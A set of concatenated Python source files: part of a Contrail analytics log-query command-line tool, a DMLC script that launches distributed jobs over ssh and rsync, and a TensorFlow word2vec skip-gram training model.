if args.analytics_api_port == None:
args.analytics_api_port = defaults['analytics_api_port']
tab_url = "http://" + args.analytics_api_ip + ":" +\
args.analytics_api_port + "/analytics/tables"
tables = OpServerUtils.get_url_http(tab_url,
args.admin_user, args.admin_password)
if tables != {}:
if tables.status_code == 200:
table_list = json.loads(tables.text)
for table in table_list:
if table['type'] == 'OBJECT':
# append to OBJECT_TYPE_LIST only if not existing
if table['name'] not in OBJECT_TABLE_MAP.values():
OBJECT_TYPE_LIST.append(str(table['name']))
# For object table the mapping between the actual table
# name and the table name used in help msg are the same
OBJECT_TABLE_MAP[table['name']]=table['name']
parser = argparse.ArgumentParser(
# Inherit options from config_parser
parents=[conf_parser],
# print script description with -h/--help
description=__doc__,
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.set_defaults(**defaults)
parser.add_argument(
"--start-time", help="Logs start time (format now-10m, now-1h)")
parser.add_argument("--end-time", help="Logs end time")
parser.add_argument(
"--last", help="Logs from last time period (format 10m, 1d)")
parser.add_argument("--source", help="Logs from source address")
parser.add_argument("--node-type", help="Logs from node type",
choices=NodeTypeNames.values())
parser.add_argument(
"--module", help="Logs from module", choices=ModuleNames.values())
parser.add_argument("--instance-id", help="Logs from module instance")
parser.add_argument("--category", help="Logs of category")
parser.add_argument("--level", help="Logs of level")
parser.add_argument("--message-type", help="Logs of message type")
parser.add_argument("--reverse", action="store_true",
help="Show logs in reverse chronological order")
parser.add_argument(
"--verbose", action="store_true", help="Show internal information")
parser.add_argument(
"--raw", action="store_true", help="Show raw XML messages")
parser.add_argument(
"--object-type", help="Logs of object type", choices=OBJECT_TYPE_LIST)
parser.add_argument("--object-values", action="store_true",
help="Display list of object names")
parser.add_argument("--object-id", help="Logs of object name")
parser.add_argument(
"--object-select-field", help="Select field to filter the log",
choices=[VizConstants.OBJECT_LOG, VizConstants.SYSTEM_LOG])
parser.add_argument("--trace", help="Dump trace buffer")
parser.add_argument("--limit", help="Limit the number of messages")
parser.add_argument("--send-syslog", action="store_true",
help="Send syslog to specified server and port")
parser.add_argument("--syslog-server",
help="IP address of syslog server", default='localhost')
parser.add_argument("--syslog-port", help="Port to send syslog to",
type=int, default=514)
parser.add_argument("--tail","-f", help="Tail logs from now", action="store_true")
parser.add_argument("--keywords", help="comma seperated list of keywords")
parser.add_argument("--message-types", \
help="Display list of message type", action="store_true")
parser.add_argument("--output-file", "-o", help="redirect output to file")
parser.add_argument("--json", help="Dump output as json", action="store_true")
parser.add_argument("--all", action="store_true", help=argparse.SUPPRESS)
self._args = parser.parse_args(remaining_argv)
self._args.admin_user = args.admin_user
self._args.admin_password = args.admin_password
self._args.analytics_api_ip = args.analytics_api_ip
self._args.analytics_api_port = args.analytics_api_port
return 0
# end parse_args
# Public functions
def query(self):
if self._args.tail and (self._args.send_syslog or self._args.reverse or
self._args.start_time or self._args.end_time):
invalid_combination = " --tail"
if self._args.send_syslog:
invalid_combination += ", --send-syslog"
if self._args.reverse:
invalid_combination += ", --reverse"
if self._args.start_time:
invalid_combination += ", --start-time"
if self._args.end_time:
invalid_combination += ", --end-time"
print "Combination of options" + invalid_combination + " are not valid."
return -1
global output_file_handle
if self._args.output_file is not None:
if output_file_handle is None:
#Open the file for writing
try:
if self._args.tail:
output_file_handle = open(self._args.output_file, "a")
else:
output_file_handle = open(self._args.output_file, "w")
except Exception as e:
print e
print "Exception occured when creating/opening file %s" % \
self._args.output_file
return -1
start_time, end_time = self._start_time, self._end_time
if self._args.message_types is True:
command_str = ("contrail-stats --table FieldNames.fields" +
" --where name=MessageTable:Messagetype --select name fields.value" +
" --start-time " + str(start_time) +
" --end-time " + str(end_time) +
" --analytics-api-ip " + str(self._args.analytics_api_ip) +
" --analytics-api-port " + str(self._args.analytics_api_port))
res = commands.getoutput(command_str)
res = res.splitlines()
res = res[1:]
for r in res:
print ast.literal_eval(r)['fields.value']
return None
messages_url = OpServerUtils.opserver_query_url(
self._args.analytics_api_ip,
self._args.analytics_api_port)
where_msg = []
where_obj = []
and_filter = []
or_filter = []
if self._args.source is not None:
if self._args.source.endswith('*'):
val = self._args.source[:-1]
oper = OpServerUtils.MatchOp.PREFIX
else:
val = self._args.source
oper = OpServerUtils.MatchOp.EQUAL
source_match = OpServerUtils.Match(name=VizConstants.SOURCE,
value=val, op=oper)
where_msg.append(source_match.__dict__)
if self._args.module is not None:
module_match = OpServerUtils.Match(name=VizConstants.MODULE,
value=self._args.module,
op=OpServerUtils.MatchOp.EQUAL)
where_msg.append(module_match.__dict__)
if self._args.category is not None:
if self._args.category.endswith('*'):
val = self._args.category[:-1]
oper = OpServerUtils.MatchOp.PREFIX
else:
val = self._args.category
oper = OpServerUtils.MatchOp.EQUAL
category_match = OpServerUtils.Match(
name=VizConstants.CATEGORY,
value=val, op=oper)
where_msg.append(category_match.__dict__)
if self._args.message_type is not None:
if self._args.message_type.endswith('*'):
val = self._args.message_type[:-1]
oper = OpServerUtils.MatchOp.PREFIX
else:
val = self._args.message_type
oper = OpServerUtils.MatchOp.EQUAL
message_type_match = OpServerUtils.Match(
name=VizConstants.MESSAGE_TYPE,
value=val, op=oper)
where_msg.append(message_type_match.__dict__)
if self._args.level is not None:
level_match = OpServerUtils.Match(
name=VizConstants.LEVEL,
value=SandeshLevel._NAMES_TO_VALUES[self._args.level],
op=OpServerUtils.MatchOp.LEQ)
and_filter.append(level_match.__dict__)
if self._args.node_type is not None:
node_type_match = OpServerUtils.Match(
name=VizConstants.NODE_TYPE,
value=self._args.node_type,
op=OpServerUtils.MatchOp.EQUAL)
and_filter.append(node_type_match.__dict__)
if self._args.instance_id is not None:
instance_id_match = OpServerUtils.Match(
name=VizConstants.INSTANCE_ID,
value=self._args.instance_id,
op=OpServerUtils.MatchOp.EQUAL)
and_filter.append(instance_id_match.__dict__)
# Object logs :
# --object-type <> : All logs for the particular object type
# --object-type <> --object-values : Object-id values for the particular
# object tye
# --object-type <> --object-id <> : All logs matching object-id for
# particular object type
if (self._args.object_type is not None or
self._args.object_id is not None or
self._args.object_select_field is not None or
self._args.object_values is True):
# Validate object-type
if self._args.object_type is not None:
if self._args.object_type in OBJECT_TYPE_LIST:
if self._args.object_type in OBJECT_TABLE_MAP:
table = OBJECT_TABLE_MAP[self._args.object_type]
else:
print 'Table not found for object-type [%s]' % \
(self._args.object_type)
return -1
else:
print 'Unknown object-type [%s]' % (self._args.object_type)
return -1
else:
print 'Object-type required for query'
return -1
# Validate object-id and object-values
if self._args.object_id is not None and \
self._args.object_values is False:
object_id = self._args.object_id
if object_id.endswith("*"):
id_match = OpServerUtils.Match(
name=OpServerUtils.OBJECT_ID,
value=object_id[:-1],
op=OpServerUtils.MatchOp.PREFIX)
else:
id_match = OpServerUtils.Match(
name=OpServerUtils.OBJECT_ID,
value=object_id,
op=OpServerUtils.MatchOp.EQUAL)
where_obj.append(id_match.__dict__)
elif self._args.object_id is not None and \
self._args.object_values is True:
print 'Please specify either object-id or object-values but not both'
return -1
if self._args.object_values is False:
if self._args.object_select_field is not None:
obj_sel_field = self._args.object_select_field
if not isinstance(self._args.object_select_field, list):
obj_sel_field = [self._args.object_select_field]
if VizConstants.OBJECT_LOG or VizConstants.SYSTEM_LOG \
in obj_sel_field:
self._args.object_select_field = obj_sel_field
else:
print 'Invalid object-select-field. '\
'Valid values are "%s" or "%s"' \
% (VizConstants.OBJECT_LOG,
VizConstants.SYSTEM_LOG)
return -1
else:
self._args.object_select_field = obj_sel_field = [
VizConstants.OBJECT_LOG, VizConstants.SYSTEM_LOG]
select_list = [
VizConstants.TIMESTAMP,
VizConstants.SOURCE,
VizConstants.MODULE,
VizConstants.MESSAGE_TYPE,
] + obj_sel_field
else:
if self._args.object_select_field:
print 'Please specify either object-id with ' + \
'object-select-field or only object-values'
return -1
if len(where_msg):
options = [where['name'] for where in where_msg]
print 'Invalid/unsupported where-clause options %s for object-values query' % str(options)
return -1
select_list = [
OpServerUtils.OBJECT_ID
]
if len(where_obj) or len(where_msg):
where = [where_obj + where_msg]
else:
where = None
elif self._args.trace is not None:
table = VizConstants.COLLECTOR_GLOBAL_TABLE
if self._args.source is None:
print 'Source is required for trace buffer dump'
return -1
if self._args.module is None:
print 'Module is required for trace buffer dump'
return -1
trace_buf_match = OpServerUtils.Match(
name=VizConstants.CATEGORY,
value=self._args.trace,
op=OpServerUtils.MatchOp.EQUAL)
where_msg.append(trace_buf_match.__dict__)
where = [where_msg]
select_list = [
VizConstants.TIMESTAMP,
VizConstants.MESSAGE_TYPE,
VizConstants.SEQUENCE_NUM,
VizConstants.DATA,
VizConstants.SANDESH_TYPE
]
sandesh_type_filter = OpServerUtils.Match(
name=VizConstants.SANDESH_TYPE,
value=str(
SandeshType.TRACE),
op=OpServerUtils.MatchOp.EQUAL)
and_filter.append(sandesh_type_filter.__dict__)
else:
# Message Table Query
table = VizConstants.COLLECTOR_GLOBAL_TABLE
if len(where_msg):
where = [where_msg]
else:
where = None
select_list = [
VizConstants.TIMESTAMP,
VizConstants.SOURCE,
VizConstants.MODULE,
VizConstants.CATEGORY,
VizConstants.MESSAGE_TYPE,
VizConstants.SEQUENCE_NUM,
VizConstants.DATA,
VizConstants.SANDESH_TYPE,
VizConstants.LEVEL,
VizConstants.NODE_TYPE,
VizConstants.INSTANCE_ID,
]
filter = None
if len(or_filter):
filter = [and_filter+[filt] for filt in or_filter]
elif len(and_filter):
filter = [and_filter]
if self._args.keywords is not None:
p = re.compile('\s*,\s*|\s+')
if where is None:
where = [[]]
for kwd in p.split(self._args.keywords):
message_type_match = OpServerUtils.Match(
name=VizConstants.KEYWORD,
value=kwd,
op=OpServerUtils.MatchOp.EQUAL)
for wc in where:
wc.append(message_type_match.__dict__)
# Add sort by timestamp for non object value queries
sort_op = None
sort_fields = None
if self._args.object_values is False:
if self._args.reverse:
sort_op = OpServerUtils.SortOp.DESCENDING
else:
sort_op = OpServerUtils.SortOp.ASCENDING
sort_fields = [VizConstants.TIMESTAMP]
if self._args.limit:
limit = int(self._args.limit)
else:
limit = None
messages_query = OpServerUtils.Query(table,
start_time=start_time,
end_time=end_time,
select_fields=select_list,
where=where,
filter=filter,
sort=sort_op,
sort_fields=sort_fields,
limit=limit)
if self._args.verbose:
print 'Performing query: {0}'.format(
json.dumps(messages_query.__dict__))
resp = OpServerUtils.post_url_http(
messages_url, json.dumps(messages_query.__dict__),
self._args.admin_user, self._args.admin_password)
result = {}
if resp is not None:
resp = json.loads(resp)
qid = resp['href'].rsplit('/', 1)[1]
result = OpServerUtils.get_query_result(
self._args.analytics_api_ip, self._args.analytics_api_port, qid,
self._args.admin_user, self._args.admin_password)
return result
# end query
def output(self, log_str, sandesh_level):
if self._args.json:
if isinstance(log_str,dict):
#convert to json and dump
log_str=json.dumps(log_str)
if self._args.output_file is not None:
#Append to a file specified
try:
output_file_handle.write(log_str)
output_file_handle.write("\n")
return
except Exception as e:
print e
print "Exception occured when writing file %s" % \
self._args.output_file
return -1
if self._args.send_syslog:
syslog_level = SandeshLogger._SANDESH_LEVEL_TO_LOGGER_LEVEL[
sandesh_level]
self._logger.log(syslog_level, log_str)
else:
print log_str
#end output
def read_result(self, result_gen):
if not result_gen:
return
result_list = []
for r in result_gen:
result_list.append(r)
return result_list
# end read_result
def display(self, result):
if result == [] or result is None:
return
messages_dict_list = result
# Setup logger and syslog handler
if self._args.send_syslog:
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
syslog_handler = logging.handlers.SysLogHandler(
address = (self._args.syslog_server, self._args.syslog_port))
contrail_formatter = logging.Formatter('contrail: %(message)s')
syslog_handler.setFormatter(contrail_formatter)
logger.addHandler(syslog_handler)
self._logger = logger
# For json we will be outputting list of dicts so open the list here
if self._args.json:
first = True
self.output('[', SandeshLevel.INVALID)
for messages_dict in messages_dict_list:
if VizConstants.TIMESTAMP in messages_dict:
message_dt = datetime.datetime.fromtimestamp(
int(messages_dict[VizConstants.TIMESTAMP]) /
OpServerUtils.USECS_IN_SEC)
message_dt += datetime.timedelta(
microseconds=
(int(messages_dict[VizConstants.TIMESTAMP]) %
OpServerUtils.USECS_IN_SEC))
message_ts = message_dt.strftime(OpServerUtils.TIME_FORMAT_STR)
else:
message_ts = 'Time: NA'
messages_dict[VizConstants.TIMESTAMP] = message_ts
if VizConstants.SOURCE in messages_dict:
source = messages_dict[VizConstants.SOURCE]
else:
source = 'Source: NA'
if VizConstants.NODE_TYPE in messages_dict:
node_type = messages_dict[VizConstants.NODE_TYPE]
else:
node_type = ''
if VizConstants.MODULE in messages_dict:
module = messages_dict[VizConstants.MODULE]
else:
module = 'Module: NA'
if VizConstants.INSTANCE_ID in messages_dict:
instance_id = messages_dict[VizConstants.INSTANCE_ID]
else:
instance_id = ''
if VizConstants.MESSAGE_TYPE in messages_dict:
message_type = messages_dict[VizConstants.MESSAGE_TYPE]
else:
message_type = 'Message Type: NA'
if VizConstants.SANDESH_TYPE in messages_dict:
sandesh_type = messages_dict[VizConstants.SANDESH_TYPE]
else:
sandesh_type = SandeshType.INVALID
# By default SYS_DEBUG
sandesh_level = SandeshLevel.SYS_DEBUG
if self._args.object_type is None:
if VizConstants.CATEGORY in messages_dict:
category = messages_dict[VizConstants.CATEGORY]
else:
category = 'Category: NA'
if VizConstants.LEVEL in messages_dict:
sandesh_level = messages_dict[VizConstants.LEVEL]
level = SandeshLevel._VALUES_TO_NAMES[sandesh_level]
else:
level = 'Level: NA'
messages_dict[VizConstants.LEVEL] = level
if VizConstants.SEQUENCE_NUM in messages_dict:
seq_num = messages_dict[VizConstants.SEQUENCE_NUM]
else:
seq_num = 'Sequence Number: NA'
if VizConstants.DATA in messages_dict:
# Convert XML data to dict
if self._args.raw:
data_str = messages_dict[VizConstants.DATA]
else:
OpServerUtils.messages_xml_data_to_dict(
messages_dict, VizConstants.DATA)
if isinstance(messages_dict[VizConstants.DATA], dict):
data_dict = messages_dict[VizConstants.DATA]
data_str = OpServerUtils.messages_data_dict_to_str(
data_dict, message_type, sandesh_type)
else:
data_str = messages_dict[VizConstants.DATA]
else:
data_str = 'Data not present'
if self._args.json:
if not first:
self.output(", ", sandesh_level)
else:
first = False
OpServerUtils.messages_dict_scrub(messages_dict)
self.output(messages_dict, sandesh_level)
else:
if self._args.trace is not None:
trace_str = '{0} {1}:{2} {3}'.format(
message_ts, message_type, seq_num, data_str)
self.output(trace_str, sandesh_level)
else:
log_str = \
'{0} {1} [{2}:{3}:{4}:{5}][{6}] : {7}:{8} {9}'.format(
message_ts, source, node_type, module, instance_id,
category, level, message_type, seq_num, data_str)
self.output(log_str, sandesh_level)
else:
if self._args.object_values is True:
if OpServerUtils.OBJECT_ID in messages_dict:
obj_str = messages_dict[OpServerUtils.OBJECT_ID]
print obj_str
continue
for obj_sel_field in self._args.object_select_field:
if obj_sel_field in messages_dict:
if self._args.raw:
data_str = messages_dict[obj_sel_field]
else:
# Convert XML data to dict
OpServerUtils.messages_xml_data_to_dict(
messages_dict, obj_sel_field)
if isinstance(messages_dict[obj_sel_field], dict):
data_dict = messages_dict[obj_sel_field]
data_str =\
OpServerUtils.messages_data_dict_to_str(
data_dict, message_type,
sandesh_type)
else:
data_str = messages_dict[obj_sel_field]
if data_str:
obj_str = '{0} {1} [{2}:{3}:{4}] : {5}: {6}'.format(
message_ts, source, node_type, module,
instance_id, message_type, data_str)
if self._args.json:
if not first:
self.output(", ", sandesh_level)
else:
first = False
OpServerUtils.messages_dict_scrub(messages_dict)
self.output(messages_dict, sandesh_level)
else:
self.output(obj_str, sandesh_level)
# For json we will be outputting list of dicts so close the list here
if self._args.json:
self.output(']', SandeshLevel.INVALID)
# end display
# end class LogQuerier
def main():
querier = LogQuerier()
querier.run()
# end main
if __name__ == "__main__":
main()
|
ssh.py
|
#!/usr/bin/env python3
"""
DMLC submission script by ssh
One need to make sure all slaves machines are ssh-able.
"""
from __future__ import absolute_import
from multiprocessing import Pool, Process
import os, subprocess, logging
from threading import Thread
from . import tracker
def sync_dir(local_dir, slave_node, slave_dir):
"""
sync the working directory from root node into slave node
"""
remote = slave_node[0] + ':' + slave_dir
logging.info('rsync %s -> %s', local_dir, remote)
prog = 'rsync -az --rsh="ssh -o StrictHostKeyChecking=no -p %s" %s %s' % (
slave_node[1], local_dir, remote)
subprocess.check_call([prog], shell = True)
def get_env(pass_envs):
envs = []
# get system envs
keys = ['OMP_NUM_THREADS', 'KMP_AFFINITY', 'LD_LIBRARY_PATH', 'AWS_ACCESS_KEY_ID',
'AWS_SECRET_ACCESS_KEY', 'DMLC_INTERFACE']
for k in keys:
v = os.getenv(k)
if v is not None:
envs.append('export ' + k + '=' + v + ';')
# get ass_envs
for k, v in pass_envs.items():
envs.append('export ' + str(k) + '=' + str(v) + ';')
return (' '.join(envs))
def submit(args):
assert args.host_file is not None
with open(args.host_file) as f:
tmp = f.readlines()
assert len(tmp) > 0
hosts=[]
for h in tmp:
if len(h.strip()) > 0:
# parse addresses of the form ip:port
h = h.strip()
i = h.find(":")
p = "22"
if i != -1:
p = h[i+1:]
h = h[:i]
# hosts now contain the pair ip, port
hosts.append((h, p))
def ssh_submit(nworker, nserver, pass_envs):
"""
customized submit script
"""
# thread func to run the job
def run(prog):
subprocess.check_call(prog, shell = True)
# sync programs if necessary
local_dir = os.getcwd()+'/'
working_dir = local_dir
if args.sync_dst_dir is not None and args.sync_dst_dir != 'None':
working_dir = args.sync_dst_dir
pool = Pool(processes=len(hosts))
for h in hosts:
pool.apply_async(sync_dir, args=(local_dir, h, working_dir))
pool.close()
pool.join()
# launch jobs
for i in range(nworker + nserver):
pass_envs['DMLC_ROLE'] = 'server' if i < nserver else 'worker'
(node, port) = hosts[i % len(hosts)]
logging.debug("SSH-ing to %s:%s", node, port)
pass_envs['DMLC_NODE_HOST'] = node
prog = get_env(pass_envs) + ' cd ' + working_dir + '; ' + (' '.join(args.command))
prog = 'ssh -o StrictHostKeyChecking=no ' + node + ' -p ' + port + ' \'' + prog + '\''
thread = Thread(target = run, args=(prog,))
thread.setDaemon(True)
thread.start()
return ssh_submit
tracker.submit(args.num_workers, args.num_servers,
fun_submit=ssh_submit,
pscmd=(' '.join(args.command)),
hostIP=args.host_ip)
|
word2vec.py
|
"""Multi-threaded word2vec mini-batched skip-gram model.
Trains the model described in:
(Mikolov, et. al.) Efficient Estimation of Word Representations in Vector Space
ICLR 2013.
http://arxiv.org/abs/1301.3781
This model does traditional minibatching.
The key ops used are:
* placeholder for feeding in tensors for each example.
* embedding_lookup for fetching rows from the embedding matrix.
* sigmoid_cross_entropy_with_logits to calculate the loss.
* GradientDescentOptimizer for optimizing the loss.
* skipgram custom op that does input processing.
"""
import os
import sys
import threading
import time
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
from tensorflow.models.embedding import gen_word2vec as word2vec
flags = tf.app.flags
flags.DEFINE_string("save_path", None, "Directory to write the model and "
"training summaries.")
flags.DEFINE_string("train_data", None, "Training text file. "
"E.g., unzipped file http://mattmahoney.net/dc/text8.zip.")
flags.DEFINE_string(
"eval_data", None, "File consisting of analogies of four tokens."
"embedding 2 - embedding 1 + embedding 3 should be close "
"to embedding 4."
"E.g. https://word2vec.googlecode.com/svn/trunk/questions-words.txt.")
flags.DEFINE_integer("embedding_size", 200, "The embedding dimension size.")
flags.DEFINE_integer(
"epochs_to_train", 15,
"Number of epochs to train. Each epoch processes the training data once "
"completely.")
flags.DEFINE_float("learning_rate", 0.2, "Initial learning rate.")
flags.DEFINE_integer("num_neg_samples", 100,
"Negative samples per training example.")
flags.DEFINE_integer("batch_size", 16,
"Number of training examples processed per step "
"(size of a minibatch).")
flags.DEFINE_integer("concurrent_steps", 12,
"The number of concurrent training steps.")
flags.DEFINE_integer("window_size", 5,
"The number of words to predict to the left and right "
"of the target word.")
flags.DEFINE_integer("min_count", 5,
"The minimum number of word occurrences for it to be "
"included in the vocabulary.")
flags.DEFINE_float("subsample", 1e-3,
"Subsample threshold for word occurrence. Words that appear "
"with higher frequency will be randomly down-sampled. Set "
"to 0 to disable.")
flags.DEFINE_boolean(
"interactive", False,
"If true, enters an IPython interactive session to play with the trained "
"model. E.g., try model.analogy('france', 'paris', 'russia') and "
"model.nearby(['proton', 'elephant', 'maxwell']")
flags.DEFINE_integer("statistics_interval", 5,
"Print statistics every n seconds.")
flags.DEFINE_integer("summary_interval", 5,
"Save training summary to file every n seconds (rounded "
"up to statistics interval.")
flags.DEFINE_integer("checkpoint_interval", 600,
"Checkpoint the model (i.e. save the parameters) every n "
"seconds (rounded up to statistics interval.")
FLAGS = flags.FLAGS
class Options(object):
"""Options used by our word2vec model."""
def __init__(self):
# Model options.
# Embedding dimension.
self.emb_dim = FLAGS.embedding_size
# Training options.
# The training text file.
self.train_data = FLAGS.train_data
# Number of negative samples per example.
self.num_samples = FLAGS.num_neg_samples
# The initial learning rate.
self.learning_rate = FLAGS.learning_rate
# Number of epochs to train. After these many epochs, the learning
# rate decays linearly to zero and the training stops.
self.epochs_to_train = FLAGS.epochs_to_train
# Concurrent training steps.
self.concurrent_steps = FLAGS.concurrent_steps
# Number of examples for one training step.
self.batch_size = FLAGS.batch_size
# The number of words to predict to the left and right of the target word.
self.window_size = FLAGS.window_size
# The minimum number of word occurrences for it to be included in the
# vocabulary.
self.min_count = FLAGS.min_count
# Subsampling threshold for word occurrence.
self.subsample = FLAGS.subsample
# How often to print statistics.
self.statistics_interval = FLAGS.statistics_interval
# How often to write to the summary file (rounds up to the nearest
# statistics_interval).
self.summary_interval = FLAGS.summary_interval
# How often to write checkpoints (rounds up to the nearest statistics
# interval).
self.checkpoint_interval = FLAGS.checkpoint_interval
# Where to write out summaries.
self.save_path = FLAGS.save_path
# Eval options.
# The text file for eval.
self.eval_data = FLAGS.eval_data
class Word2Vec(object):
"""Word2Vec model (Skipgram)."""
def __init__(self, options, session):
self._options = options
self._session = session
self._word2id = {}
self._id2word = []
self.build_graph()
self.build_eval_graph()
self.save_vocab()
self._read_analogies()
def _read_analogies(self):
"""Reads through the analogy question file.
Returns:
questions: a [n, 4] numpy array containing the analogy question's
word ids.
questions_skipped: questions skipped due to unknown words.
"""
questions = []
questions_skipped = 0
with open(self._options.eval_data) as analogy_f:
for line in analogy_f:
if line.startswith(":"): # Skip comments.
continue
words = line.strip().lower().split(" ")
ids = [self._word2id.get(w.strip()) for w in words]
if None in ids or len(ids) != 4:
questions_skipped += 1
else:
questions.append(np.array(ids))
print "Eval analogy file: ", self._options.eval_data
print "Questions: ", len(questions)
print "Skipped: ", questions_skipped
self._analogy_questions = np.array(questions, dtype=np.int32)
def forward(self, examples, labels):
"""Build the graph for the forward pass."""
opts = self._options
# Declare all variables we need.
# Embedding: [vocab_size, emb_dim]
init_width = 0.5 / opts.emb_dim
emb = tf.Variable(
tf.random_uniform(
[opts.vocab_size, opts.emb_dim], -init_width, init_width),
name="emb")
self._emb = emb
# Softmax weight: [vocab_size, emb_dim]. Transposed.
sm_w_t = tf.Variable(
tf.zeros([opts.vocab_size, opts.emb_dim]),
name="sm_w_t")
# Softmax bias: [emb_dim].
sm_b = tf.Variable(tf.zeros([opts.vocab_size]), name="sm_b")
# Global step: scalar, i.e., shape [].
self.global_step = tf.Variable(0, name="global_step")
# Nodes to compute the nce loss w/ candidate sampling.
labels_matrix = tf.reshape(
tf.cast(labels,
dtype=tf.int64),
[opts.batch_size, 1])
# Negative sampling.
sampled_ids, _, _ = (tf.nn.fixed_unigram_candidate_sampler(
true_classes=labels_matrix,
num_true=1,
num_sampled=opts.num_samples,
unique=True,
range_max=opts.vocab_size,
distortion=0.75,
unigrams=opts.vocab_counts.tolist()))
# Embeddings for examples: [batch_size, emb_dim]
example_emb = tf.nn.embedding_lookup(emb, examples)
# Weights for labels: [batch_size, emb_dim]
true_w = tf.nn.embedding_lookup(sm_w_t, labels)
# Biases for labels: [batch_size, 1]
true_b = tf.nn.embedding_lookup(sm_b, labels)
# Weights for sampled ids: [num_sampled, emb_dim]
sampled_w = tf.nn.embedding_lookup(sm_w_t, sampled_ids)
# Biases for sampled ids: [num_sampled, 1]
sampled_b = tf.nn.embedding_lookup(sm_b, sampled_ids)
# True logits: [batch_size, 1]
true_logits = tf.reduce_sum(tf.mul(example_emb, true_w), 1) + true_b
# Sampled logits: [batch_size, num_sampled]
# We replicate sampled noise lables for all examples in the batch
# using the matmul.
sampled_b_vec = tf.reshape(sampled_b, [opts.num_samples])
sampled_logits = tf.matmul(example_emb,
sampled_w,
transpose_b=True) + sampled_b_vec
return true_logits, sampled_logits
def nce_loss(self, true_logits, sampled_logits):
"""Build the graph for the NCE loss."""
# cross-entropy(logits, labels)
opts = self._options
true_xent = tf.nn.sigmoid_cross_entropy_with_logits(
true_logits, tf.ones_like(true_logits))
sampled_xent = tf.nn.sigmoid_cross_entropy_with_logits(
sampled_logits, tf.zeros_like(sampled_logits))
# NCE-loss is the sum of the true and noise (sampled words)
# contributions, averaged over the batch.
nce_loss_tensor = (tf.reduce_sum(true_xent) +
tf.reduce_sum(sampled_xent)) / opts.batch_size
return nce_loss_tensor
def optimize(self, loss):
"""Build the graph to optimize the loss function."""
# Optimizer nodes.
# Linear learning rate decay.
opts = self._options
words_to_train = float(opts.words_per_epoch * opts.epochs_to_train)
lr = opts.learning_rate * tf.maximum(
0.0001, 1.0 - tf.cast(self._words, tf.float32) / words_to_train)
self._lr = lr
optimizer = tf.train.GradientDescentOptimizer(lr)
train = optimizer.minimize(loss,
global_step=self.global_step,
gate_gradients=optimizer.GATE_NONE)
self._train = train
def build_eval_graph(self):
"""Build the eval graph."""
# Eval graph
# Each analogy task is to predict the 4th word (d) given three
# words: a, b, c. E.g., a=italy, b=rome, c=france, we should
# predict d=paris.
# The eval feeds three vectors of word ids for a, b, c, each of
# which is of size N, where N is the number of analogies we want to
# evaluate in one batch.
analogy_a = tf.placeholder(dtype=tf.int32) # [N]
analogy_b = tf.placeholder(dtype=tf.int32) # [N]
analogy_c = tf.placeholder(dtype=tf.int32) # [N]
# Normalized word embeddings of shape [vocab_size, emb_dim].
nemb = tf.nn.l2_normalize(self._emb, 1)
# Each row of a_emb, b_emb, c_emb is a word's embedding vector.
# They all have the shape [N, emb_dim]
a_emb = tf.gather(nemb, analogy_a) # a's embs
b_emb = tf.gather(nemb, analogy_b) # b's embs
c_emb = tf.gather(nemb, analogy_c) # c's embs
# We expect that d's embedding vectors on the unit hyper-sphere is
# near: c_emb + (b_emb - a_emb), which has the shape [N, emb_dim].
target = c_emb + (b_emb - a_emb)
# Compute cosine distance between each pair of target and vocab.
# dist has shape [N, vocab_size].
dist = tf.matmul(target, nemb, transpose_b=True)
# For each question (row in dist), find the top 4 words.
_, pred_idx = tf.nn.top_k(dist, 4)
# Nodes for computing neighbors for a given word according to
# their cosine distance.
nearby_word = tf.placeholder(dtype=tf.int32) # word id
nearby_emb = tf.gather(nemb, nearby_word)
nearby_dist = tf.matmul(nearby_emb, nemb, transpose_b=True)
nearby_val, nearby_idx = tf.nn.top_k(nearby_dist,
min(1000, self._options.vocab_size))
# Nodes in the construct graph which are used by training and
# evaluation to run/feed/fetch.
self._analogy_a = analogy_a
self._analogy_b = analogy_b
self._analogy_c = analogy_c
self._analogy_pred_idx = pred_idx
self._nearby_word = nearby_word
self._nearby_val = nearby_val
self._nearby_idx = nearby_idx
def build_graph(self):
"""Build the graph for the full model."""
opts = self._options
# The training data. A text file.
(words, counts, words_per_epoch, self._epoch, self._words, examples,
labels) = word2vec.skipgram(filename=opts.train_data,
batch_size=opts.batch_size,
window_size=opts.window_size,
min_count=opts.min_count,
subsample=opts.subsample)
(opts.vocab_words, opts.vocab_counts,
opts.words_per_epoch) = self._session.run([words, counts, words_per_epoch])
opts.vocab_size = len(opts.vocab_words)
print "Data file: ", opts.train_data
print "Vocab size: ", opts.vocab_size - 1, " + UNK"
print "Words per epoch: ", opts.words_per_epoch
self._examples = examples
self._labels = labels
self._id2word = opts.vocab_words
for i, w in enumerate(self._id2word):
self._word2id[w] = i
true_logits, sampled_logits = self.forward(examples, labels)
loss = self.nce_loss(true_logits, sampled_logits)
tf.scalar_summary("NCE loss", loss)
self._loss = loss
self.optimize(loss)
# Properly initialize all variables.
tf.initialize_all_variables().run()
self.saver = tf.train.Saver()
def save_vocab(self):
"""Save the vocabulary to a file so the model can be reloaded."""
opts = self._options
with open(os.path.join(opts.save_path, "vocab.txt"), "w") as f:
for i in xrange(opts.vocab_size):
f.write(opts.vocab_words[i] + " " + str(opts.vocab_counts[i]) + "\n")
def _train_thread_body(self):
initial_epoch, = self._session.run([self._epoch])
while True:
_, epoch = self._session.run([self._train, self._epoch])
if epoch != initial_epoch:
break
def train(self):
"""Train the model."""
opts = self._options
initial_epoch, initial_words = self._session.run([self._epoch, self._words])
summary_op = tf.merge_all_summaries()
summary_writer = tf.train.SummaryWriter(opts.save_path,
graph_def=self._session.graph_def)
workers = []
for _ in xrange(opts.concurrent_steps):
t = threading.Thread(target=self._train_thread_body)
t.start()
workers.append(t)
last_words, last_time, last_summary_time = initial_words, time.time(), 0
last_checkpoint_time = 0
while True:
time.sleep(opts.statistics_interval) # Reports our progress once a while.
(epoch, step, loss, words, lr) = self._session.run(
[self._epoch, self.global_step, self._loss, self._words, self._lr])
now = time.time()
last_words, last_time, rate = words, now, (words - last_words) / (
now - last_time)
print("Epoch %4d Step %8d: lr = %5.3f loss = %6.2f words/sec = %8.0f\r" %
(epoch, step, lr, loss, rate)),
sys.stdout.flush()
if now - last_summary_time > opts.summary_interval:
summary_str = self._session.run(summary_op)
summary_writer.add_summary(summary_str, step)
last_summary_time = now
if now - last_checkpoint_time > opts.checkpoint_interval:
self.saver.save(self._session,
opts.save_path + "model",
global_step=step.astype(int))
last_checkpoint_time = now
if epoch != initial_epoch:
break
for t in workers:
t.join()
return epoch
